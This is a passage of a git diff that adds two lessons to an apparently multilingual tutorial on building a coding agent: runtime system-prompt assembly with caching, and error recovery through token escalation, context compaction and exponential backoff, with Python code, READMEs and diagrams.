+ + diff --git a/s10_system_prompt/README.md b/s10_system_prompt/README.md new file mode 100644 index 000000000..f808ec99f --- /dev/null +++ b/s10_system_prompt/README.md @@ -0,0 +1,235 @@ +# s10: System Prompt — 运行时组装,不硬编码
+
+[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md)
+
+s01 → ... → s08 → s09 → `s10` → [s11](../s11_error_recovery/) → s12 → ... → s19
+
+> *"prompt 是组装出来的, 不是写死的"* — 分段 + 按需拼接。
+>
+> **Harness 层**: 提示 — 运行时组装, 不硬编码。
+
+---
+
+## 问题
+
+从 s01 到 s09,system prompt 都是一行硬编码:
+
+```python
+SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks."
+```
+
+s01 够用——只有 bash、read、write 三个工具。但到 s09,Agent 已经有记忆、有压缩、有技能加载。prompt 该提的能力越来越多:
+
+```python
+SYSTEM = (
+    f"You are a coding agent at {WORKDIR}. "
+    "Use tools to solve tasks. Act, don't explain. "
+    "Before starting any multi-step task, use todo_write. "
+    "Skills are available via list_skills and load_skill. "
+    "Relevant memories are injected below when available. "
+    # ... 加一个能力就多一段
+)
+```
+
+三个问题:
+
+1. **换项目要重写整个 prompt**——从 Python 换到 React,不知道哪些该改、哪些该留
+2. **修改一处可能影响全局**——加一段工具描述,可能跟前面的指令冲突
+3. **每次请求都带全部内容**——即使当前对话用不到技能加载,也带着那段描述浪费 token
+
+**prompt 应该像乐高——不同场景拼不同的积木,而不是一整块水泥。**
+
+---
+
+## 解决方案
+
+![System Prompt Overview](images/system-prompt-overview.svg)
+
+s09 的循环、压缩、记忆全部保留。唯一的变动:把硬编码的 `SYSTEM` 拆成独立段落(section),运行时根据上下文按需拼接,缓存结果避免重复组装。
+
+六个 section,两种加载策略:
+
+| Section | 加载策略 | 内容 |
+|---------|---------|------|
+| identity | 始终 | 你是谁、怎么做事 |
+| tools | 始终 | 可用工具列表 |
+| workspace | 始终 | 工作目录、环境信息 |
+| planning | 按需 | 多步任务时加载规划指令 |
+| skills | 按需 | 有可用技能时加载 |
+| memory | 按需 | 有相关记忆时注入 |
+
+---
+
+## 工作原理
+
+### PROMPT_SECTIONS: 分段定义
+
+把一大段字符串拆成字典,每个 key 是一个主题:
+
+```python
+PROMPT_SECTIONS = {
+    "identity": "You are a coding agent. 
Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob...", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "memory": "Relevant memories are injected below when available.", +} +``` + +每个 section 独立维护——修改 `tools` 不影响 `identity`,新增 `memory` 不动 `planning`。 + +### assemble_system_prompt: 按需拼接 + +字典有了,但不是所有 section 每次都需要。当前对话没有多步任务,加载 `planning` 只是浪费 token。根据 `context` 决定加载哪些: + +```python +def assemble_system_prompt(context: dict) -> str: + """根据当前上下文组装 system prompt。""" + sections = [] + + # 始终加载 + sections.append(PROMPT_SECTIONS["identity"]) + sections.append(PROMPT_SECTIONS["tools"]) + sections.append(PROMPT_SECTIONS["workspace"]) + + # 按需加载 + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + + return "\n\n".join(sections) +``` + +"始终加载"的是每轮都需要的——身份、工具、工作目录。"按需加载"的只在特定条件下才有用。 + +为什么不全加载?**token 有成本**(system prompt 每轮计费),**信息越少 LLM 越专注**(无关指令是噪音)。 + +### get_system_prompt: 缓存避免重复拼接 + +上下文没变时(同一轮对话的多次 LLM 调用,context 相同),重新拼接是浪费。用 hash 检测变化,命中缓存直接返回: + +```python +_last_context_hash = None +_last_prompt = None + +def get_system_prompt(context: dict) -> str: + """带缓存的 system prompt 获取。""" + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash = h + _last_prompt = assemble_system_prompt(context) + return _last_prompt +``` + +缓存的前提:`context` 变了才重新组装。CC 在 API 层还有 prompt cache——静态部分 global cache,动态部分 org cache——教学版用 hash 简化。 + +### 合起来跑 + +```python +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + response = client.messages.create( + model=MODEL, system=system, 
messages=messages, + tools=TOOLS, max_tokens=8000) + # ... 工具执行 ... + context = update_context(context, messages) + system = get_system_prompt(context) +``` + +每轮循环开头拿一次 system prompt。context 变了就重新组装,没变就返回缓存。 + +--- + +## 相对 s09 的变更 + +| 组件 | 之前 (s09) | 之后 (s10) | +|------|-----------|-----------| +| prompt | 硬编码 SYSTEM 字符串 | PROMPT_SECTIONS + assemble_system_prompt | +| 缓存 | 无 | get_system_prompt(hash 检测 + 缓存) | +| 新函数 | — | assemble_system_prompt, get_system_prompt | +| 工具 | bash, read_file, write_file (3) | bash, read_file, write_file (3) — 不变 | +| 循环 | 用固定 SYSTEM | 用 get_system_prompt(context) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s10_system_prompt/code.py +``` + +观察重点: + +1. 输出中能看到哪些 section 被加载了(`[assembled] sections: ...` 标签) +2. 连续对话时,context 变化后 prompt 是否重新组装 +3. 缓存命中时,是否显示 `[cache hit]` 跳过重新拼接 + +--- + +## 接下来 + +system prompt 组装好了、记忆有了、压缩有了。Agent 看起来什么都能处理——直到 LLM 调用失败。 + +网络抖动、API 限流、输出被截断、上下文超限——这些不是 bug,是常态。Agent 不能一碰错误就崩溃。 + +s11 Error Recovery → 四条恢复路径。升级 token、压缩上下文、指数退避、切换模型。错误不是结束,是重试的开始。 + +
+深入 CC 源码
+
+> 以下基于 CC 源码 `prompts.ts`(914 行)、`systemPromptSections.ts`(68 行)、`context.ts`(189 行)的完整分析。
+
+### 一、不是几段话,是 21 个 Section
+
+教学版用简单的字典存储 prompt 片段。CC 的 system prompt 由 21 个 section 组成,分静态和动态两层:
+
+**静态(跨组织可缓存)**:identity、system、doing_tasks、actions、using_tools、tone_style、output_efficiency——这些始终加载。
+
+**动态(通过注册表解析)**:session_guidance、memory、env_info、language、output_style、mcp_instructions、scratchpad、frc、summarize_tool_results、token_budget——这些按缓存策略加载。
+
+`mcp_instructions` 是唯一的**易失性** section(`cacheBreak: true`)——因为 MCP server 可以在轮次间连接和断开。
+
+### 二、组装函数签名
+
+```typescript
+getSystemPrompt(tools, model, additionalWorkingDirs?, mcpClients?): Promise<string[]>
+```
+
+返回 `Promise<string[]>`(每个元素是一个 section),由 `SYSTEM_PROMPT_DYNAMIC_BOUNDARY` 分隔静态和动态部分。这个分隔符还用来确定 Anthropic API 的 `cache_scope`——边界前 `global`,边界后 `org`。
+
+### 三、三层缓存
+
+1. **lodash memoize**:`getSystemContext` 和 `getUserContext` 在整个会话中缓存(`context.ts:36,116,155`)
+2. **注册表缓存**:`STATE.systemPromptSectionCache`(`bootstrap/state.ts:203`)缓存动态 section 的结果。`/clear` 或 `/compact` 时清除
+3. **API 级缓存**:`splitSysPromptPrefix()`(`api.ts:321`)把 prompt 分成带不同 `cache_scope` 的块——静态部分 global cache,动态部分 org cache
+
+### 四、getUserContext vs getSystemContext
+
+| | getSystemContext | getUserContext |
+|---|---|---|
+| 内容 | gitStatus、cacheBreaker | CLAUDE.md 内容、currentDate |
+| 注入方式 | **追加**到 system prompt 数组 | **前置**为 `` 用户消息 |
+| 何时跳过 | 自定义 system prompt 时 | 始终运行 |
+
+### 五、模式如何改变 Prompt
+
+- **CLAUDE_CODE_SIMPLE**:整个 prompt 只有 2 行
+- **Proactive/KAIROS**:用紧凑版 prompt 替换所有标准 section
+- **Coordinator**:用协调器专用 prompt 完全替换
+- **Agent 模式**:Agent 定义的 prompt 替换或追加到默认 prompt
+
+### 六、总大小
+
+标准交互模式下 system prompt 核心约 20-30KB 文本。CLAUDE_CODE_SIMPLE 约 150 字符。用户上下文(CLAUDE.md)和系统上下文(git status)在此基础上累加。
+
+
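上文提到 `mcp_instructions` 是唯一带 `cacheBreak: true` 的易失性 section。下面用一段示意性的 Python 模拟这一行为:字段名与函数名都是教学假设,并非 CC 源码的真实接口。

```python
# 示意代码:cacheBreak=True 的 section 每轮重算,其余命中缓存。
SECTION_DEFS = {
    "identity": {"cache_break": False},
    "env_info": {"cache_break": False},
    "mcp_instructions": {"cache_break": True},  # 唯一的易失性 section
}

_cache = {}
calls = {name: 0 for name in SECTION_DEFS}  # 统计每个 section 的计算次数

def resolve(name: str) -> str:
    if SECTION_DEFS[name]["cache_break"] or name not in _cache:
        calls[name] += 1
        _cache[name] = f"<{name} v{calls[name]}>"
    return _cache[name]

for _ in range(3):  # 模拟 3 轮组装
    prompt = [resolve(name) for name in SECTION_DEFS]

# calls -> identity/env_info 各计算 1 次,mcp_instructions 计算 3 次
```

这正是易失性 section 的代价:它每轮都会打破后续内容的缓存前缀,所以 CC 把它放在靠后的位置,并尽量只保留一个。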
+ + diff --git a/s10_system_prompt/code.py b/s10_system_prompt/code.py new file mode 100644 index 000000000..51448cc53 --- /dev/null +++ b/s10_system_prompt/code.py @@ -0,0 +1,217 @@ +#!/usr/bin/env python3 +""" +s10: System Prompt — Runtime prompt assembly with hash-based caching. + +Run: python s10_system_prompt/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s09: + - PROMPT_SECTIONS: topic-keyed dict of prompt fragments + - assemble_system_prompt(context): select + join sections by context + - get_system_prompt(context): hash-based cache wrapper + - agent_loop uses get_system_prompt(context) instead of hardcoded SYSTEM + +ASCII flow: + PROMPT_SECTIONS ──→ assemble_system_prompt(context) ──→ get_system_prompt (cache) + │ + ▼ system= + messages[] ──→ compress ──→ load memories ──→ LLM ──→ tools ──→ loop +""" + +import os, subprocess +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Prompt Sections ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. 
Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob...", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + """Select and join prompt sections based on current context.""" + sections = [] + + # Always loaded + sections.append(PROMPT_SECTIONS["identity"]) + sections.append(PROMPT_SECTIONS["tools"]) + sections.append(PROMPT_SECTIONS["workspace"]) + + # Conditional + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + + return "\n\n".join(sections) + + +_last_context_hash = None +_last_prompt = None + + +def get_system_prompt(context: dict) -> str: + """Cache wrapper — reassemble only when context changes.""" + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + print(" \033[90m[cache hit] system prompt unchanged\033[0m") + return _last_prompt + _last_context_hash = h + _last_prompt = assemble_system_prompt(context) + + loaded = ["identity", "tools", "workspace"] + if context.get("has_todos"): + loaded.append("planning") + if context.get("has_skills"): + loaded.append("skills") + if context.get("memories"): + loaded.append("memory") + print(f" \033[32m[assembled] sections: {', '.join(loaded)}\033[0m") + return _last_prompt + + +# ── Tools ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + 
capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, +] + +TOOL_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + """Derive context from current conversation state.""" + text = " ".join(str(m.get("content", ""))[:200] for m in messages[-6:]).lower() + return { + "has_todos": "todo" in text, + "has_skills": "skill" in text, + "memories": context.get("memories", ""), + } + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + """Main loop — uses assembled system prompt instead of hardcoded SYSTEM.""" + system = 
get_system_prompt(context) + while True: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + + # Re-evaluate context and prompt after each tool round + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s10: system prompt") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "memories": ""} + while True: + try: + query = input("\033[36ms10 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s10_system_prompt/images/system-prompt-overview.en.svg b/s10_system_prompt/images/system-prompt-overview.en.svg new file mode 100644 index 000000000..3e504c950 --- /dev/null +++ b/s10_system_prompt/images/system-prompt-overview.en.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + System Prompt — PROMPT_SECTIONS + On-Demand Assembly + Cache + + + + s09 Preserved + + s10 New + + + + + + PROMPT_SECTIONS + ✓ identity (always) + ✓ tools (always) + ✓ workspace (always) + ○ planning · skills · memory + + + + 
+ + + assemble_system_prompt + Input: context dict + Always: identity + tools + workspace + On-demand: planning · skills · memory + Output: "\n\n".join(selected) + + + + + + + get_system_prompt + hash(context) + Hit → return cached + Miss → assemble + store + (s10 new) + + + + system= + + + + + + messages[] + + + + + + + Compression + Loading + snip → micro → budget → auto + → load memory (s09) + + + + + + + LLM + system = assembled + + + + + + + TOOL_HANDLERS + bash · read · write + (s09 preserved) + + + + Tool results → messages[] → compress → load memory → assemble prompt → LLM + + + + + s09 Preserved: loop, compression pipeline, memory loading, tool execution + + s10 New: PROMPT_SECTIONS (6 sections) + assemble_system_prompt + get_system_prompt (cache) + diff --git a/s10_system_prompt/images/system-prompt-overview.ja.svg b/s10_system_prompt/images/system-prompt-overview.ja.svg new file mode 100644 index 000000000..ba912aaaa --- /dev/null +++ b/s10_system_prompt/images/system-prompt-overview.ja.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + System Prompt — PROMPT_SECTIONS + オンデマンド組み立て + キャッシュ + + + + s09 保持 + + s10 新規 + + + + + + PROMPT_SECTIONS + ✓ identity (常時) + ✓ tools (常時) + ✓ workspace (常時) + ○ planning · skills · memory + + + + + + + assemble_system_prompt + 入力: context dict + 常時: identity + tools + workspace + オンデマンド: planning · skills · memory + 出力: "\n\n".join(selected) + + + + + + + get_system_prompt + hash(context) + ヒット → キャッシュ返却 + ミス → assemble + 保存 + (s10 新規) + + + + system= + + + + + + messages[] + + + + + + + 圧縮 + ロード + snip → micro → budget → auto + → 記憶ロード (s09) + + + + + + + LLM + system = assembled + + + + + + + TOOL_HANDLERS + bash · read · write + (s09 保持) + + + + ツール結果 → messages[] → 圧縮 → 記憶ロード → プロンプト組み立て → LLM + + + + + s09 保持:ループ、圧縮パイプライン、記憶ロード、ツール実行 + + s10 新規:PROMPT_SECTIONS(6 セクション)+ assemble_system_prompt + get_system_prompt(キャッシュ) + diff --git a/s10_system_prompt/images/system-prompt-overview.svg 
b/s10_system_prompt/images/system-prompt-overview.svg new file mode 100644 index 000000000..37f8bff70 --- /dev/null +++ b/s10_system_prompt/images/system-prompt-overview.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + System Prompt — PROMPT_SECTIONS + 按需拼接 + 缓存 + + + + s09 保留 + + s10 新增 + + + + + + PROMPT_SECTIONS + ✓ identity (始终) + ✓ tools (始终) + ✓ workspace (始终) + ○ planning · skills · memory + + + + + + + assemble_system_prompt + 输入: context dict + 始终: identity + tools + workspace + 按需: planning · skills · memory + 输出: "\n\n".join(selected) + + + + + + + get_system_prompt + hash(context) + 命中 → 返回缓存 + 未命中 → assemble + 存 + (s10 新增) + + + + system= + + + + + + messages[] + + + + + + + 压缩 + Loading + snip → micro → budget → auto + → 加载记忆 (s09) + + + + + + + LLM + system = assembled + + + + + + + TOOL_HANDLERS + bash · read · write + (s09 保留) + + + + 工具结果 → messages[] → 压缩 → 加载记忆 → 组装 prompt → LLM + + + + + s09 保留:循环、压缩管线、记忆加载、工具执行 + + s10 新增:PROMPT_SECTIONS(6 段)+ assemble_system_prompt + get_system_prompt(缓存) + diff --git a/s11_error_recovery/README.en.md b/s11_error_recovery/README.en.md new file mode 100644 index 000000000..c8f8673df --- /dev/null +++ b/s11_error_recovery/README.en.md @@ -0,0 +1,257 @@ +# s11: Error Recovery — Errors aren't the end, they're the start of a retry + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s09 → s10 → `s11` → [s12](../s12_task_system/) → s13 → ... → s19 +> *"Errors aren't the end, they're the start of a retry"* — escalate tokens, compact context, switch models. +> +> **Harness layer**: Resilience — classify and recover when the main loop hits errors. + +--- + +## The Problem + +The Agent is running along and then errors out: + +``` +Error: 529 overloaded +``` + +The Agent crashes. It doesn't retry, doesn't switch models, doesn't reduce context — it just crashes. + +In production, API errors are the norm. 
The three most common failure modes: **truncated output** (the model runs out of tokens mid-sentence), **context overflow** (still too long even after compaction), and **transient failures** (429 rate limiting / 529 overload / network drops). An Agent that doesn't handle errors is like a car that stalls at the slightest touch. + +--- + +## Solution + +![Error Recovery Overview](images/error-recovery-overview.en.svg) + +The loop and prompt assembly from s10 are fully preserved. The only change: the LLM call is wrapped in try/except, with different recovery paths based on error type. After recovery, `continue` loops back to the top to call the LLM again. + +The three most common recovery patterns (CC actually has 13+ reason codes; see the Deep Dive for the rest): + +| Pattern | Trigger | Recovery Action | +|----------|---------|-----------------| +| Output truncated | `max_tokens` | Escalate 8K→64K / continuation prompt | +| Context overflow | `prompt_too_long` | Reactive compact → retry | +| Transient failure | 429 / 529 | Exponential backoff + jitter | + +--- + +## How It Works + +### Path 1: Output Truncated + +The model runs out of tokens mid-sentence — `max_tokens` is exhausted. The default 8000 tokens isn't enough for a complete response. + +On the first occurrence, escalate `max_tokens` from 8K to 64K (8x the space) and retry the same request. If 64K is still not enough, inject a continuation prompt telling the model to pick up where it left off, up to 3 times: + +```python +ESCALATED_MAX_TOKENS = 64000 + +if response.stop_reason == "max_tokens": + if not state.has_escalated: + max_tokens = ESCALATED_MAX_TOKENS + state.has_escalated = True + continue + if state.recovery_count < MAX_RECOVERY_RETRIES: + messages.append({"role": "user", "content": + "Output token limit hit. Resume directly — " + "no apology, no recap. Pick up mid-thought."}) + state.recovery_count += 1 + continue +``` + +Escalation gets one chance; continuation gets up to 3. 
After that, exit — further continuations won't produce meaningful output. + +### Path 2: Context Overflow + +The LLM says "your context is too long" (`prompt_too_long`). All four compaction layers from s08 have already run, and it's still over the limit. + +Trigger reactive compact — more aggressive than auto compact, keeping only the last 5 messages plus a summary. Retry after compacting. But if it's still over the limit after one compaction, the only option is to exit — compacting again won't make it any smaller: + +```python +except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return # Already compacted and still over limit — must exit +``` + +### Path 3: Transient Failures + +Network blips, 429 rate limiting, 529 overload — these aren't bugs, they're normal in distributed systems. + +Exponential backoff + jitter: wait 0.5 seconds on the first attempt, 1 second on the second, 2 seconds on the third, up to 10 retries. Random jitter prevents concurrent requests from all retrying at the same instant. Three consecutive 529 overload errors → switch to the fallback model: + +```python +def with_retry(fn, state, max_retries=10): + for attempt in range(max_retries): + try: + return fn() + except RateLimitError: + delay = min(500 * (2 ** attempt), 32000) + random_jitter() + time.sleep(delay / 1000) + except OverloadedError: + state.consecutive_529 += 1 + if state.consecutive_529 >= 3: + switch_to_fallback_model() + time.sleep(500 / 1000) + raise MaxRetriesExceeded() +``` + +Backoff formula: `min(500 × 2^attempt, 32000) + random(0~25%)`. If the server returns a `Retry-After` header, that value takes priority. 
+ +### Putting It All Together + +```python +def agent_loop(messages, context): + system = get_system_prompt(context) + state = RecoveryState() + max_tokens = 8000 + + while True: + try: + response = with_retry( + lambda: client.messages.create( + model=MODEL, system=system, + messages=messages, tools=TOOLS, + max_tokens=max_tokens), + state) + except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return + except Exception as e: + log_error(e) + return + + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason == "max_tokens": + # Path 1: escalate or continue + ... + continue + if response.stop_reason != "tool_use": + return + # ... tool execution ... +``` + +The outer try/except catches API exceptions (prompt_too_long, network errors), `with_retry` handles transient errors (429/529), and `stop_reason` checks handle truncation. Three recovery mechanisms, each handling its own error type. + +--- + +## Changes from s10 + +| Component | Before (s10) | After (s11) | +|-----------|-------------|-------------| +| Error handling | None (crashes on any error) | Three recovery patterns + exponential backoff | +| New constants | — | ESCALATED_MAX_TOKENS=64000, MAX_RETRIES=10, BASE_DELAY_MS=500 | +| New functions | — | with_retry, reactive_compact, RecoveryState | +| Tools | bash, read_file, write_file (3) | bash, read_file, write_file (3) — unchanged | +| Loop | Bare LLM call | Wrapped in try/except + continue retry | + +--- + +## Try It + +```sh +cd learn-claude-code +python s11_error_recovery/code.py +``` + +Try these prompts: + +1. Ask the Agent to generate a very long piece of code, and observe whether it automatically continues after truncation (look for the `[max_tokens] escalating` log) +2. Read many files consecutively to bloat the context, and observe reactive compact +3. 
If you encounter 429/529, observe the exponential backoff log output + +--- + +## What's Next + +The Agent can now automatically recover from errors. But the tasks it handles are still one-shot — you give it a task, it finishes, it's done. + +What if the Agent could manage a **task list** — with dependencies, persisted to disk, resumable across sessions? A TODO list is not a task system. + +s12 Task System → Tasks form a dependency graph with state and persistence. This is the foundation for multi-Agent collaboration. + +
+Deep Dive into CC Source + +> The following is based on a complete analysis of CC source code: `query.ts` (1729 lines), `withRetry.ts`, and `tokenBudget.ts`. + +### 1. 13+ Reason Codes (Not Just 3) + +The teaching version covers 3 of the most common recovery patterns. CC actually has 13+ reason codes, evaluated after every LLM call: + +| Reason Code | Teaching Version | CC Behavior | +|---|---|---| +| `completed` | Normal completion | Return result | +| `max_output_tokens_escalate` | Path 1 | 8K→64K escalation | +| `max_output_tokens_recovery` | Path 1 continuation | Continuation prompt (up to 3 times) | +| `reactive_compact_retry` | Path 2 | Reactive compact → retry | +| `prompt_too_long` | Path 2 | Same as above | +| `model_error` | Not covered | Retry | +| `image_error` | Not covered | `ImageSizeError` / `ImageResizeError` handled specifically | +| `aborted_streaming` | Not covered | Streaming abort recovery | +| `stop_hook_blocking` | Not covered | Inject blocking error → model self-corrects | +| `stop_hook_prevented` | Not covered | Hooks prevent execution | +| `token_budget_continuation` | Not covered | Continue when token usage < 90% | +| `blocking_limit` | Not covered | Blocking limit reached | +| `collapse_drain_retry` | Not covered | Context collapse — commit staged content first | + +The teaching version only expands on the first 5 (most common); each of the rest has its own dedicated handling logic. + +### 2. Precise Exponential Backoff Formula + +CC's backoff delay (`withRetry.ts:530-548`): + +``` +delay = min(500 × 2^(attempt-1), 32000) + random(0~25%) +``` + +| Attempt | Base Delay | + Jitter | +|---------|-----------|----------| +| 1 | 500ms | 0-125ms | +| 2 | 1000ms | 0-250ms | +| 4 | 4000ms | 0-1000ms | +| 7+ | 32000ms (cap) | 0-8000ms | + +If the server returns a `Retry-After` header, that value takes priority. + +### 3. Original CONTINUATION Prompt + +CC's continuation prompt (`query.ts:1225-1227`): + +``` +Output token limit hit. 
Resume directly — no apology, no recap of what +you were doing. Pick up mid-thought if that is where the cut happened. +Break remaining work into smaller pieces. +``` + +Token budget nudge prompt (`tokenBudget.ts:72`): + +``` +Stopped at {pct}% of token target. Keep working — do not summarize. +``` + +### 4. Streaming Error Handling + +In CC's streaming path, recoverable errors (413, max_tokens, media errors) are **withheld from display** during streaming (`query.ts:799-822`) — SDK consumers don't see them, only the recovery logic does. After streaming ends, the system determines whether recovery is needed. + +### 5. 529 → Fallback Model Switch + +After 3 consecutive 529 overload errors (`MAX_529_RETRIES = 3`), CC automatically switches to the fallback model (e.g., Opus → Sonnet). On switch, all pending messages and tool results are cleared, and the user sees "Switched to {model} due to high demand". + +### 6. Diminishing Returns Detection + +Token budget "continuations" aren't unlimited. When there are 3 consecutive continuations with a token increment < 500, the system determines "continuing won't produce meaningful output" and stops continuation (`tokenBudget.ts:60-62`). + +
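The stop condition from section 6 can be sketched in a few lines of Python. This is an illustrative model only — `ContinuationTracker` and its names are mine, not CC's; the thresholds (3 consecutive continuations, < 500-token increment) come from the section above:

```python
class ContinuationTracker:
    """Stop continuing once the last 3 continuations each added < 500 tokens."""

    MIN_INCREMENT = 500   # tokens a continuation must add to count as progress
    MAX_STALLED = 3       # consecutive stalled continuations before giving up

    def __init__(self) -> None:
        self.stalled_streak = 0

    def should_continue(self, tokens_added: int) -> bool:
        # A productive continuation resets the streak; a stalled one extends it.
        if tokens_added < self.MIN_INCREMENT:
            self.stalled_streak += 1
        else:
            self.stalled_streak = 0
        return self.stalled_streak < self.MAX_STALLED


t = ContinuationTracker()
assert t.should_continue(2000)    # productive round — keep going
assert t.should_continue(300)     # stalled x1
assert t.should_continue(100)     # stalled x2
assert not t.should_continue(50)  # stalled x3 — stop continuing
```

A single productive round anywhere in the run resets the streak, so only an unbroken run of near-empty continuations triggers the stop.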
+ + diff --git a/s11_error_recovery/README.ja.md b/s11_error_recovery/README.ja.md new file mode 100644 index 000000000..270fa17d5 --- /dev/null +++ b/s11_error_recovery/README.ja.md @@ -0,0 +1,257 @@ +# s11: Error Recovery — エラーは終わりではなく、リトライの始まり + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s09 → s10 → `s11` → [s12](../s12_task_system/) → s13 → ... → s19 +> *"エラーは終わりではなく、リトライの始まり"* — トークン拡張、コンテキスト圧縮、モデル切り替え。 +> +> **Harness 層**: 耐障害性 — メインループのエラーを分類し復旧。 + +--- + +## 課題 + +Agent が動いている途中でエラーが出た: + +``` +Error: 529 overloaded +``` + +Agent がクラッシュした。リトライもしない、モデルも切り替えない、コンテキストも減らさない——そのままクラッシュ。 + +本番環境では API エラーが日常茶飯事。最も一般的な 3 つの障害パターン:**出力の切り詰め**(モデルが途中まで出力して token が尽きた)、**コンテキスト超過**(圧縮後も長すぎる)、**一時的障害**(429 レート制限 / 529 過負荷 / ネットワーク断)。エラーを処理しない Agent は、一度触れただけで止まる車のようなものだ。 + +--- + +## 解決策 + +![Error Recovery Overview](images/error-recovery-overview.ja.svg) + +s10 のループ、prompt 組み立てはすべてそのまま。唯一の変更点:LLM 呼び出しを try/except で包み、エラータイプに応じて異なる復旧パスに振り分ける。復旧後は `continue` でループ先頭に戻り、再度 LLM を呼び出す。 + +最も一般的な 3 つの復旧パターン(CC には実際 13 以上の reason code があるが、残りは Deep dive で解説): + +| パターン | トリガー | 復旧アクション | +|----------|----------|---------------| +| 出力切り詰め | `max_tokens` | 8K→64K に拡張 / 続きのプロンプト注入 | +| コンテキスト超過 | `prompt_too_long` | reactive compact → リトライ | +| 一時的障害 | 429 / 529 | 指数バックオフ + ジッター | + +--- + +## 仕組み + +### パス 1: 出力が切り詰められた + +モデルが途中まで出力して、`max_tokens` に達した。デフォルトの 8000 token では完全な回答を出力しきれない。 + +初回発生時、`max_tokens` を 8K から 64K に拡張(8 倍の空間)し、同じリクエストをリトライする。64K でも足りない場合、続きのプロンプトを注入してモデルに先ほどの続きを出力させる。最大 3 回まで: + +```python +ESCALATED_MAX_TOKENS = 64000 + +if response.stop_reason == "max_tokens": + if not state.has_escalated: + max_tokens = ESCALATED_MAX_TOKENS + state.has_escalated = True + continue + if state.recovery_count < MAX_RECOVERY_RETRIES: + messages.append({"role": "user", "content": + "Output token limit hit. Resume directly — " + "no apology, no recap. 
